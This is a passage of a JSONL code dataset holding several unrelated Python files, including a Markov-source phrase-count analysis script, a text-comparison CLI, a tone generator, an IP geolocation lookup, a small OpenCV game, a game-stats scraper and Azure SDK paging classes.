     ns,\n        asympt,\n        color=\"blue\",\n        label=r\"$\\frac{\\sqrt{n}(\\mu-E_{th})}{\\log_2 n}$\",\n        linestyle=\"-\",\n    )\n    axs[2].set_title(r\"Verifying $\\frac{\\sqrt{n}(\\mu-E_{th})}{\\log_2 n} = o(1)$\")\n\n    # axs[2].plot(ns, inv_diff, color='blue', label=\"$(\\Delta E)^{-1}\", linestyle=\"-\")\n    # axs[2].set_title(\"Inverse of $\\Delta E$ with logarithmic n\")\n    # axs[2].set_xscale('log')\n\n    axs[0].set_ylabel(\n        \"Different computations for number of phrases expectancy $E(M_n)$\"\n    )\n    for ax in axs:\n        ax.set_xlabel(\"Word length n\")\n        ax.legend()\n\n    if save:\n        print(\"Saving figure as \" + save_name)\n        plt.savefig(save_name, dpi=\"figure\")\n\n\ndef cdf(data):\n    \"\"\"Outputs the cumulative distribution of a set of data\"\"\"\n\n    ntotal = len(data)\n    cdfs = []\n\n    for x in sorted(data):\n        cdfs.append(len([d for d in data if d <= x]) / ntotal)\n\n    return cdfs\n\n\ndef cdf2(xs, data):\n    \"\"\"Outputs the cumulative distribution of data evaluated at the points xs\"\"\"\n\n    ntotal = len(data)\n    cdfs = []\n\n    for x in xs:\n        c = len([d for d in data if d <= x])\n        cdfs.append(c / ntotal)\n\n    return cdfs\n\n\ndef print_cdf(exp, ax, mean, std):\n    \"\"\"Plots the CDF of the experiment exp on the axis ax, against the normal CDF\"\"\"\n\n    mu = exp[mean]\n    std = exp[std]\n\n    mi = min(exp[\"data\"])\n    ma = max(exp[\"data\"])\n\n    xs = np.linspace((mi - mu) / std, (ma - mu) / std, 500)\n    norm_cdf = [norm.cdf(x) for x in xs]\n\n    norm_data = (exp[\"data\"] - mu) / std\n    data_cdf = cdf2(xs, norm_data)\n\n    ax.plot(xs, data_cdf, color=\"green\", label=\"Data CDF\")\n    ax.plot(xs, norm_cdf, color=\"red\", label=\"Normal CDF\")\n\n    ax.legend()\n\n    ax.set_title(\n        r\"$n_{word} =\"\n        + latex_float(exp[\"n_word\"])\n        + r\"\\quad n_{exp} = \"\n        + latex_float(exp[\"n_exp\"])\n        + \"$\"\n    )\n    ax.set_xlabel(\n        r\"$\\frac{(M_n-\" + (r\"\\mu\" if mean == \"mu\" else r\"E_{theor}\") + r\")}{\\sigma}$\"\n    )\n\n\ndef latex_float(f):\n    float_str = \"{0:.2g}\".format(f)\n    if \"e\" in float_str:\n        base, exponent = float_str.split(\"e\")\n        return r\"{0} \\cdot 10^{{{1}}}\".format(base, int(exponent))\n    else:\n        return float_str\n\n\ndef print_histogram_chains(random_markov=True, datafile=None, fast_mode=True):\n    \"\"\"Prints the histogram_chains corresponding to datasets of words generated by a\n    Markov source.\"\"\"\n    # Plotting raw M_n values\n    exps = data_analysis(\n        random_markov=random_markov, datafile=datafile, fast_mode=fast_mode\n    )[-5:]\n\n    # Raw histograms; not useful anymore\n    # figs_raw, axs = plt.subplots(1, len(exps))\n    # 
axs[0].set_ylabel(\"Counts\")\n #\n # for (i, exp) in enumerate(exps):\n # sns.distplot(exp[\"data\"], ax=axs[i], rug=True, kde=False, bins=\"auto\")\n # axs[i].set_title(\n # r\"$n_{word} =\"\n # + latex_float(exp[\"n_word\"])\n # + r\"\\quad n_{exp} = \"\n # + latex_float(exp[\"n_exp\"])\n # + \"$\"\n # )\n # axs[i].set_xlabel(\"$M_n$\")\n\n # Normalized distirbutions plots, using mu, mean and empirical std\n # k = 0 is empirical mean and variance\n # k = 1 is theoretical mean and empirical variance\n empirical_std = False\n\n if empirical_std:\n figs_mean_std, axs_mean_std = plt.subplots(1, len(exps))\n figs_normalized, axs_normalized = plt.subplots(1, len(exps))\n\n axs = [axs_normalized, axs_mean_std]\n means = [\"mu\", \"mean\"]\n\n for k in [0, 1]:\n ax = axs[k]\n mean = means[k]\n ax[0].set_ylabel(\"Frequency\")\n\n for (i, exp) in enumerate(exps):\n norm_distrib = (exp[\"data\"] - exp[mean]) / exp[\"std\"]\n # statistic, pvalue = normaltest(norm_distrib)\n sns.distplot(\n norm_distrib,\n ax=ax[i],\n rug=True,\n label=r\"Simulation $\\frac{M_n -\"\n + (r\"\\mu\" if mean == \"mu\" else r\"E_{theor}\")\n + r\"}{\\sigma}$\",\n )\n # ax[i].text(-4, 0.3, r'$test=%1.3f$' % statistic)\n # ax[i].text(-4, 0.28, r'$pvalue=%1.3f$' % pvalue)\n ax[i].set_title(\n r\"$n_{word} =\"\n + latex_float(exp[\"n_word\"])\n + \"\\quad n_{exp} = \"\n + latex_float(exp[\"n_exp\"])\n + \"$\"\n )\n ax[i].set_xlabel(\n r\"$\\frac{(M_n-\"\n + (\"\\mu\" if mean == \"mu\" else \"E_{theor}\")\n + \")}{\\sigma}$\"\n )\n\n # Print awaited normal distribution\n ax[i].plot(\n exp[\"x\" + str(k * 3)],\n exp[\"p\" + str(k * 3)],\n color=\"red\",\n label=\"$\\mathcal{N}(0,1)$\",\n )\n\n # k=0 is plotting distributions centered with empirical mean (mu and nein/szpan)\n # k=1 is plotting distributions norm with theoretical mean and variances (mu and nein/szpan)\n figs1, axs1 = plt.subplots(1, len(exps))\n figs2, axs2 = plt.subplots(1, len(exps))\n figs4, axs4 = plt.subplots(1, len(exps))\n figs5, axs5 = plt.subplots(1, len(exps))\n\n figs = [figs1, figs2, figs4, figs5]\n axes = [axs1, axs2, axs4, axs5]\n means = [\"mu\", \"mu\", \"mean\", \"mean\"]\n stds = [\"std_nein\", \"std_szpan\"] * 2\n stds_pprint = [\"std_{Nein}\", \"std_{Szpan}\"] * 2\n\n for k in [0, 1, 2, 3]:\n\n ax = axes[k]\n mean = means[k]\n std = stds[k]\n std_pprint = stds_pprint[k]\n\n # three subplots\n for (i, exp) in enumerate(exps):\n norm_distrib = (exp[\"data\"] - exp[mean]) / exp[std]\n # statistic, pvalue = normaltest(norm_distrib)\n sns.distplot(norm_distrib, ax=ax[i], rug=True)\n # ax[i].text(-4, 0.3, r'$test=%1.3f$' % statistic)\n # ax[i].text(-4, 0.28, r'$pvalue=%1.3f$' % pvalue)\n\n ax[i].set_title(\n r\"$n_{word} =\"\n + latex_float(exp[\"n_word\"])\n + \"\\quad n_{exp} = \"\n + latex_float(exp[\"n_exp\"])\n + \"$\"\n )\n ax[i].set_xlabel(\n \"$(M_n-\"\n + (\"\\mu\" if mean == \"mu\" else \"E_{theor}\")\n + \") / \"\n + std_pprint\n + \"$\"\n )\n ax[i].set_ylabel(\"Frequency\")\n\n s = 0\n if k >= 2:\n s = 1\n ax[i].plot(\n exp[\"x\" + str(k + 1 + s)],\n exp[\"p\" + str(k + 1 + s)],\n color=\"red\",\n label=\"$\\mathcal{N}(0,1)$\",\n )\n\n # figs_raw.suptitle(\n # \"Histogram_chains of the values of $M_n$ for different word lengths\"\n # )\n # figs_mean_std.suptitle(\n # \"$M_n$ distribution, normalized with theoretical mean\"\n # + \"($E_{th}$) and empirical variance ($\\sigma^2$)\"\n # )\n # figs_normalized.suptitle(\n # \"$M_n$ distribution, normalized using empirical mean ($\\mu$) and variance ($\\sigma^2$)\"\n # )\n\n i = 0\n for n1 in 
[\"empirical\", \"theoretical\"]:\n for n2 in [\"Neininger\", \"Szpankowski\"]:\n figs[i].suptitle(\n \"$M_n$ distribution, normalized with {} mean and {} variance.\".format(\n n1, n2\n )\n )\n i += 1\n\n top = 0.91\n bottom = 0.06\n left = 0.04\n right = 0.99\n hspace = 0.32\n wspace = 0.13\n\n # for ax in axs_normalized:\n # ax.legend()\n\n # for ax in axs_mean_std:\n # ax.legend()\n\n for ax in axes:\n for a in ax:\n a.legend()\n\n for f in figs:\n f.subplots_adjust(\n top=top, bottom=bottom, left=left, right=right, hspace=hspace, wspace=wspace\n )\n\n # figs_normalized.subplots_adjust(\n # top=top, bottom=bottom, left=left, right=right, hspace=hspace, wspace=wspace\n # )\n # figs_mean_std.subplots_adjust(\n # top=top, bottom=bottom, left=left, right=right, hspace=hspace, wspace=wspace\n # )\n # figs_raw.subplots_adjust(\n # top=top, bottom=bottom, left=left, right=right, hspace=hspace, wspace=wspace\n # )\n\n print(\"Done\")\n plt.show()\n\n\ndef files_choice(arg, name):\n \"\"\"Return None, None if arguments weren't provided at program launch\"\"\"\n try:\n if arg == \"--file\":\n return name, None\n elif arg == \"--save\":\n return None, name\n else:\n return None, None\n except:\n return None, None\n\n\nif __name__ == \"__main__\":\n try:\n df, fs = files_choice(sys.argv[2], sys.argv[3])\n except:\n df, fs = None, None\n\n if len(sys.argv) > 1:\n # x = input(\"Do you want to save the generated figures ? y/N \")\n x = False # temporary\n # save = False if (x.lower() == 'n') else bool(x)\n save = False\n\n if sys.argv[1] == \"-s\":\n\n simulation(random_markov=True, filesave=sys.argv[2])\n\n elif sys.argv[1] == \"-m\":\n\n save_name = None\n\n if save:\n save_name = input(\"What prefix for mean analysis figures ?\")\n\n analysing_theoretical_mean(\n datafile=df, filesave=fs, save=save, save_name=save_name\n )\n\n elif sys.argv[1] == \"-v\":\n\n save_name = None\n\n if save:\n\n save_name = input(\"What prefix for std analysis figures ?\")\n\n analysing_theoretical_std(\n datafile=df, filesave=fs, save=save, save_name=save_name\n )\n\n elif sys.argv[1] == \"-cdf\":\n\n experiments, ns = data_loading(datafile=df)\n figs, axs = plt.subplots(1, len(exps))\n\n for (exp_index, one_exp) in enumerate(experiments):\n print_cdf(one_exp, axs[exp_ind], \"mu\", \"std\")\n\n figs.suptitle(\"Cumulative distribution function plots for normalized $M_n$\")\n\n elif sys.argv[1] == \"-range\":\n\n print(\"Prompting for range of simulation `range(a, b, s)`\")\n a = int(input(\"a = \"))\n b = int(input(\"b = \"))\n s = int(input(\"s = \"))\n ns = list(range(a, b, s))\n n_exp = int(input(\"\\nHow many experiments ? 
\"))\n\n simulation(\n random_markov=True, filesave=sys.argv[2], length_values=ns, n_exp=n_exp\n )\n\n else:\n print_histogram_chains(random_markov=True, datafile=sys.argv[1])\n\n plt.show()\n\n else:\n print_histogram_chains(random_markov=True)\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":25137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"23940499","text":"from selenium.webdriver.common.by import By\nfrom page import Page\n\n\nclass Base(Page):\n\n @property\n def footer(self):\n return self.Footer(self.testsetup)\n\n class Footer(Page):\n\n footer_links_list = [\n {\n 'locator': (By.CSS_SELECTOR, '#fsl > a:nth-child(1)'),\n 'url_suffix': '//www.google.com/intl/en/ads/?fg=1',\n },\n ]\n\n\n\n","sub_path":"pages/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"613423814","text":"\"\"\"\ndphon\n \nUsage:\n dphon [--n=] [--output=] [--variants-only]\n dphon -h | --help\n dphon --version\n \nOptions:\n -h --help Show this screen.\n --version Show program version.\n --variants-only Limit to matches with graphic variation.\n --n= Limit to matches with length >= n [default: 3].\n \nExamples:\n dphon 老子丙.txt 老子乙.txt --output=matches.txt\n dphon 周南.txt 鹿鳴之什.txt --variants-only\n \nHelp:\n For more information on using this tool, please visit the Github repository:\n https://github.com/direct-phonology/direct\n\"\"\"\n\nfrom sys import stderr, stdin, stdout\nfrom docopt import docopt\n\nfrom . import __version__\nfrom .lib import Comparator\n\n\ndef run():\n \"\"\"CLI entrypoint.\"\"\"\n arguments = docopt(__doc__, version=__version__)\n # read in the two files\n with open(arguments[''], encoding='utf-8') as file:\n text1 = file.read()\n with open(arguments[''], encoding='utf-8') as file:\n text2 = file.read()\n # store their texts and filenames\n c = Comparator(a=text1,\n b=text2,\n a_name=arguments[''],\n b_name=arguments[''])\n # get and reduce initial matches\n matches = c.get_matches(min_length=int(arguments['--n']))\n # if requested, remove matches without graphic variation\n if arguments['--variants-only']:\n matches = c.matches_with_graphic_variation(matches)\n # group matches and format for output\n groups = Comparator.group_matches(matches)\n output = c.resolve_groups(groups)\n # write to a file if requested\n if arguments['--output']:\n with open(arguments['--output'], mode='w', encoding='utf8') as file:\n file.write(output)\n # otherwise write to stdout\n else:\n stdout.buffer.write(output.encode('utf-8'))\n","sub_path":"dphon/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"518788043","text":"import sys\nimport wos_parser\nimport wos_graph\nimport wos_clasterization\n\nif __name__ == \"__main__\":\n if \"help\" in sys.argv:\n print(\"Parameters:\")\n print(\"showmds - show multidimensional scaling\")\n print(\"nodownload - don't download new article, use old\")\n print(\"showts - show titles for every claster\")\n print(\"showhdc - show hierarchical document clustering\")\n print(\"showlda - show latent Dirichlet allocation\")\n sys.exit()\n print(\"Add 'help' for showing parameters\")\n print(\"Input search string\")\n topic_name = input()\n\n if \"nodownload\" in sys.argv:\n print(\"Input count of articles\")\n cnt_articles = 
int(input())\n else:\n cnt_articles = wos_parser.site_parser(topic_name)\n articles = []\n for i in range(1, cnt_articles+1):\n wos_parser.article_parser(topic_name + str(i), articles)\n articles = wos_parser.correct_articles(articles)\n\n articles = wos_graph.build_graph(articles, topic_name)\n\n showmds = 0\n showts = 0\n showhdc = 0\n showlda = 0\n if \"showmds\" in sys.argv:\n showmds = 1\n if \"showts\" in sys.argv:\n showts = 1\n if \"showhdc\" in sys.argv:\n showhdc = 1\n if \"showlda\" in sys.argv:\n showlda = 1\n\n wos_clasterization.build_csv(articles, topic_name)\n wos_clasterization.article_clasterization(topic_name, showmds, showts,\n showhdc, showlda)\n","sub_path":"article/art_main.py","file_name":"art_main.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"323267603","text":"# -*- coding: utf-8 -*-\n\n################################################\n################# Imports ######################\n################################################\n\nimport wave\nimport numpy as np\nimport pygame\nfrom scipy import signal\nimport matplotlib.pylab as plt\nfrom matplotlib import pyplot\nimport customFunctions as fun\n\n\n################################################=\n################# Parameters ###################\n################################################\n\nBASE_AMP = 10000 # amplitude of nonaccented tone... −32,768 to +32,767 range for 16bit\nACCENT_AMP = 20000 # amplitude of accented tone... −32,768 to +32,767 range for 16bit\nSAMPLERATE = 48000 # Hz\nNCHANNELS = 1 # mono: sound played identically in both channels\nSOUNDLEN = .4 #\nSOUNDFREQ = 333 # Hz... 333 is about Ab in pitch\n\nfinalDuration = SOUNDLEN * 10 #seconds\nnTones = int(finalDuration/SOUNDLEN) # how many sounds per the total duration\n\n################################################\n########### Constructing Pure Tone #############\n################################################\n\n# calculate the total amount of cycles in the SOUNDLEN\nncycles = SOUNDLEN * SOUNDFREQ\n\n# calculate the total amount of samples per SOUNDLEN\nnsamples = SOUNDLEN * SAMPLERATE\n\n# calculate samples per cycle\nspc = nsamples / ncycles\n\n# stepsize: distance between samples within a cycle\nstepsize = (2*np.pi) / spc\n\n# create a range of numbers between 0 and 2*pi\nx = np.arange(0, 2*np.pi, stepsize)\n\n# make a sine wave out of the range\nsine = np.sin(x)\n\n# increase the amplitude\nsine_nonaccent = sine * BASE_AMP\nsine_accent = sine * ACCENT_AMP\n\n# repeat the sine wave for the length of the tone\ntone_nonaccent = np.tile(sine_nonaccent, int(ncycles))\ntone_accent = np.tile(sine_accent, int(ncycles))\n\nprint(len(tone_accent))\nprint(nsamples)\n\n\n################################################\n############ Modulating Sine Tone ##############\n################################################\n\n# Modulation variables\nrise_fall_ratio = 19 #(1/842)*16095 # rise_fall_ratio:1 ratio of rise and fall ramps\nwindow_floor = 0.2 # creating window between .2 and 1\n\n# calculate asymmetric Hanning vector (22ms rise and 394 fall)\nriseLen = len(tone_accent) / rise_fall_ratio \nfallLen = len(tone_accent) - riseLen \n\n# create Hann vector for rise len * 2\nriseVec = fun.customHanning((riseLen * 2), window_floor)\n# delete second half of vector (after 1.0)... i.e. 
only want upramp\nriseVec = riseVec[0:int(riseLen)]\n\n# create Hann vector for fall len * 2\nfallVec = fun.customHanning((fallLen * 2), window_floor)\n# delete first half of vector\nfallVec = fallVec[int(fallLen):]\n\n# combine vectors\nhannVec = np.concatenate((riseVec, fallVec),)\n\nif len(hannVec) > len(tone_nonaccent): # check for rounding problems with hannVec length\n hannVec = hannVec[0:len(tone_nonaccent)]\n\n# apply Hanning amplitude modulation\ntone_nonaccent = tone_nonaccent * hannVec\ntone_accent = tone_accent * hannVec\n\n################################################\n############## Final mixing etc ################\n################################################\n\n# tile tones to the desired length\nmeter = np.concatenate((tone_accent, tone_accent),)\n\nfinal_output = np.tile(meter, int(nTones/2))\n\n# initialise mixer module (it requires the sampling rate and num of channels)\npygame.mixer.init(frequency=SAMPLERATE, channels=NCHANNELS)\n\n# create sound out of the allsines vector\ntone = pygame.mixer.Sound(final_output.astype('int16'))\n\n# open new wave file objects\ntonefile = wave.open('beat_noaccent.wav', 'w')\n\n# set parameters for pure tone\ntonefile.setframerate(SAMPLERATE)\ntonefile.setnchannels(NCHANNELS)\ntonefile.setsampwidth(2) # in units of bytes and 8 bits per byte = 16bit\n\n# get buffers\ntonebuffer = tone.get_raw()\n\n# write raw buffer to the wave file\ntonefile.writeframesraw(tonebuffer)\n\n# close the wave file \ntonefile.close()\n\n# Done!\n","sub_path":"tone.py","file_name":"tone.py","file_ext":"py","file_size_in_byte":3900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"154168665","text":"\n#!/usr/bin/python\n# coding:utf-8\n# Copyright (C) 2005-2016 All rights reserved.\n# FILENAME: \t taobao_test.py\n# VERSION: \t 1.0\n# CREATED: \t 2016-05-30 10:14\n# AUTHOR: \t xuexiang\n# DESCRIPTION:\n#\n# HISTORY:\n#*************************************************************\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\nimport comm\nimport re\nimport comm.PLog\nimport comm.requests_pkg\nimport comm.stone_funs\nimport json\n\n#ip = \"36.188.19.157\"\nip = \"223.104.255.231\"\nip = \"223.104.171.69\"\nip = \"113.210.187.106\"\nip = \"121.8.124.2\"\nurl = 'http://ip.taobao.com/service/getIpInfo.php?ip=' + ip\n(http_ok, resp) = comm.requests_pkg.get(url)\n\nreturn_info = \"\"\n\nif http_ok:\n #resp_content = comm.stone_funs.ToUtf8(resp.content)\n\n #resp_content = resp.content.encode('utf-8', 'ignore')\n json_data = json.loads(resp.content)\n \n #country\n contry_name = json_data[u'data'][u'country'].encode('utf-8')\n comm.PLog.Log(contry_name)\n\n #area\n area_name = json_data[u'data'][u'area'].encode('utf-8')\n comm.PLog.Log(area_name)\n\n #city\n city_name = json_data[u'data'][u'city'].encode('utf-8')\n comm.PLog.Log(city_name)\n\n #region\n region_name = json_data[u'data'][u'region'].encode('utf-8')\n comm.PLog.Log(region_name)\n\n #county\n county_name = json_data[u'data'][u'county'].encode('utf-8')\n comm.PLog.Log(county_name)\n\n result = []\n result.append(json_data[u'data'][u'ip'].encode('utf-8')) \n result.append(json_data[u'data'][u'country'].encode('utf-8'))\n result.append(json_data[u'data'][u'country_id'].encode('utf-8'))\n result.append(json_data[u'data'][u'area'].encode('utf-8'))\n result.append(json_data[u'data'][u'area_id'].encode('utf-8'))\n result.append(json_data[u'data'][u'region'].encode('utf-8'))\n result.append(json_data[u'data'][u'region_id'].encode('utf-8'))\n 
result.append(json_data[u'data'][u'city'].encode('utf-8'))\n    result.append(json_data[u'data'][u'city_id'].encode('utf-8'))\n    result.append(json_data[u'data'][u'county'].encode('utf-8'))\n    result.append(json_data[u'data'][u'county_id'].encode('utf-8'))\n    result.append(json_data[u'data'][u'isp'].encode('utf-8'))\n    result.append(json_data[u'data'][u'isp_id'].encode('utf-8')) \n    tt= \" \".join(result)\n    comm.PLog.Log(tt)\n\n\n    #resp_content = resp.content.decode('utf-8');\n    #resp_content = resp_content.strip()\n    #comm.PLog.Log(\"resp_content: \" + resp_content)\n\n    #addr_list = re.split(r'\\s+', resp_content)\n    #comm.PLog.Log(resp_content)\n\n","sub_path":"mo_collect_clean/taobao_test.py","file_name":"taobao_test.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"444506699","text":"import sys\nimport ASAPPpy.feature_extraction as fe\n\nfrom importlib import reload\n\nword2vec_model = None\nfasttext_model = None\nptlkb64_model = None\nglove300_model = None\nnumberbatch_model = None\n\nif __name__ == \"__main__\":\n    models_loaded = 0\n    while True:\n        if models_loaded == 0:\n            word2vec_model, fasttext_model, ptlkb64_model, glove300_model, numberbatch_model = fe.load_embeddings_models()\n            models_loaded = 1\n        fe.run_feature_extraction(word2vec_model=word2vec_model, fasttext_model=fasttext_model, ptlkb64_model=ptlkb64_model, glove300_model=glove300_model, numberbatch_model=numberbatch_model)\n        print(\"Press enter to re-run the script, CTRL-C to exit\")\n        sys.stdin.readline()\n        reload(fe)\n    ","sub_path":"ASAPPpy/tests/wrapper_feature_extraction.py","file_name":"wrapper_feature_extraction.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"615441555","text":"import dj_database_url\nfrom decouple import config\n\nfrom settings.base import *\nfrom settings.constants import HOURS\n\nSECRET_KEY = config('SECRET_KEY')\n\nALLOWED_HOSTS = config('ALLOWED_HOSTS').split(',')\n\nDEBUG = False\n\nSTATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'\nSTATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')\nSTATIC_URL = '/static/'\nSTATICFILES_DIRS = (\n    os.path.join(BASE_DIR, 'static'),\n)\n\nMIDDLEWARE += [\n    'whitenoise.middleware.WhiteNoiseMiddleware'\n]\n\n\nDATABASES = {\n    'default': dj_database_url.config(\n        default=config('DATABASE_URL')\n    )\n}\n","sub_path":"source/settings/production.py","file_name":"production.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"147683935","text":"# 1.6 string compression\ns1 = \"gkdkkssjjffddggg\"\nans = \"\"\ncount = 1\nfor i in range(len(s1)):\n    if i == len(s1) - 1 or s1[i] != s1[i+1]:\n        ans += s1[i] + str(count)\n        count = 0\n    count = count + 1\n# only print the compressed form when it is actually shorter than the original\nprint(ans if len(ans) < len(s1) else s1)\n","sub_path":"stringcompression.py","file_name":"stringcompression.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"154569362","text":"import sys\nimport json\n\nquery_entities = {}\n\nwith open('../queries-v2.txt') as qf:\n    for line in qf:\n        qid, _ = line.rstrip().split('\\t')\n        query_entities[qid] = []\n\nwith open(sys.argv[1]) as cmns_file:\n    for line in cmns_file:\n        line = line.rstrip()\n        qid, score, uri = line.split('\\t')\n        score = float(score)\n        
query_entities[qid].append((uri, score))\n\noutput_json = {}\nfor qid, entities in query_entities.items():\n    output_entities = []\n    for entity, score in entities:\n        entity = entity[1:-1]\n        entity = entity.replace(\"dbpedia:\", \"http://dbpedia.org/resource/\")\n        output_entities.append((entity, score))\n    output_json[qid] = {'entities': output_entities}\n\nwith open(sys.argv[2], 'w') as qef:\n    json.dump(output_json, qef, sort_keys=True,\n              indent=4, separators=(',', ': '))\n","sub_path":"entity-extraction/nordlys/convert-nordlys-output.py","file_name":"convert-nordlys-output.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"30007089","text":"# coding=utf8\nimport os\nimport configparser\n\nclass readConfig:\n    def __init__(self):\n        # current directory path\n        self.proDir = os.path.split(os.path.realpath(__file__))[0]\n\n    # read the environment settings file\n    def readSetting(self):\n        sConf = configparser.ConfigParser()\n        # path of the file to read\n        sPath = os.path.join(self.proDir, 'setting.ini')\n        sConf.read(sPath, encoding='utf8')\n        setting = sConf.get('select', 'setting')\n        return setting\n\n    # read another project's config file\n    def readOther(self, projectName, interfaceName):\n        oConf = configparser.ConfigParser()\n        # path of the file to read\n        oPath = os.path.join(self.proDir, '%s.ini'%projectName)\n        oConf.read(oPath, encoding='utf8')\n        return oConf.get(readConfig().readSetting(),interfaceName)","sub_path":"InterfaceTest/Config/readConfig.py","file_name":"readConfig.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"194148261","text":"import cv2\nimport random\nimport numpy as np\n\nscore=0\ntime=0\n\ndef WhacAMole(event,x,y,flags,param):\n    global score\n    # the mole occupies rows 50*x1..50*(x1+1) and columns 50*y1..50*(y1+1),\n    # while the mouse callback receives x as the column and y as the row\n    if event==cv2.EVENT_LBUTTONDOWN and 50*y1<=x<=50*(y1+1) and 50*x1<=y<=50*(x1+1):\n        score=score+1\n        print(\"your score is: \"+str(score))\n\nprint(\"hello\")\nimg=cv2.imread(\"20.png\")\n\nimgold=img.copy()\nwhile True:\n    img=imgold.copy()\n    head=img[220:270,235:285].copy()\n    x1=random.randint(0,2)\n    y1=random.randint(0,2)\n    img[50*x1:50*(x1+1),50*y1:50*(y1+1)]=img[220:270,235:285]\n    \n    for x2 in range(3):\n        for y2 in range(3):\n            cv2.rectangle(img,(0+50*x2,0+50*y2),(50+50*x2,50+50*y2),(0,255,0),3)\n    \n    cv2.imshow(\"image\",img)\n    cv2.setMouseCallback('image',WhacAMole)\n    cv2.waitKey(500)\n    time=time+1\n    if time>30:\n        break\nprint(\"Game over. 
Your final score is \"+str(score))\n","sub_path":"dml/Whoc-A-Mole.py","file_name":"Whoc-A-Mole.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"147190888","text":"import json, codecs\n\ndef getSetting(type=\"ALL\"):\n try:\n with codecs.open(\"settings.json\",\"r\",encoding=\"UTF-8\") as f:\n jsonString = f.read()\n setting = json.loads(jsonString)\n if type != \"ALL\":\n if type in setting['logs'].keys():\n return setting['logs'][type]\n else:\n return \"Key Not Found\"\n else:\n return setting['logs']\n except:\n return \"File I/O Err\"","sub_path":"Server NetworkLogger/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"612146698","text":"from django.http import HttpResponse, Http404\nimport urllib2\nfrom bs4 import BeautifulSoup as BS\nimport json\nfrom StringIO import StringIO\nimport gzip\n\ndef profile(request, name, region):\n\tLK = 'http://www.lolking.net/search'\n\tprofile = {}\n\n\tif not name or not region:\n\t\traise Http404\n\n\trequest = urllib2.Request(''.join([LK, '?name={0}®ion={1}'.format(name.encode('utf-8'), region)]))\n\trequest.add_header('Accept-encoding', 'gzip')\n\tresponse = urllib2.urlopen(request)\n\n\tsoup = None\n\tif response.info().get('Content-Encoding') == 'gzip':\n\t\tbuf = StringIO(response.read())\n\t\tf = gzip.GzipFile(fileobj=buf)\n\t\tsoup = BS(f.read())\n\telse:\n\t\tsoup = BS(response.read())\n\n\tif 'Search Results' in soup.title.text:\n\t\traise Http404\n\n\tnick_d = soup.find('div', id='summoner-titlebar-summoner-name')\n\tnick = nick_d.text\n\tprofile[nick] = {}\n\n\telo_d = soup.find_all('div', class_='personal_ratings_rating')[1]\n\telo = elo_d.text.strip()\n\tprofile[nick]['elo'] = elo\n\n\tlp_d = elo_d.findNext('div')\n\t#just 'X' from 'X League Points'\n\tlp = lp_d.text.split(' ')[0]\n\tprofile[nick]['lp'] = lp\n\n\tlks_d = lp_d.findNext('div')\n\tlks = lks_d.text.strip()\n\tprofile[nick]['lks'] = lks\n\n\twins_d = lks_d.findNext('span')\n\twins = wins_d.text\n\tprofile[nick]['wins'] = wins\n\n\tlosses_d = wins_d.findNext('span')\n\tlosses = losses_d.text\n\tprofile[nick]['losses'] = losses\n\n\treturn HttpResponse(json.dumps(profile, indent=4), content_type='application/json')\n","sub_path":"lk/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"141076177","text":"# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. 
See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.paging import Paged\n\n\nclass ApplicationGatewayPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`ApplicationGateway ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[ApplicationGateway]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(ApplicationGatewayPaged, self).__init__(*args, **kwargs)\nclass ApplicationGatewaySslPredefinedPolicyPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`ApplicationGatewaySslPredefinedPolicy ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[ApplicationGatewaySslPredefinedPolicy]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(ApplicationGatewaySslPredefinedPolicyPaged, self).__init__(*args, **kwargs)\nclass ApplicationSecurityGroupPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`ApplicationSecurityGroup ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 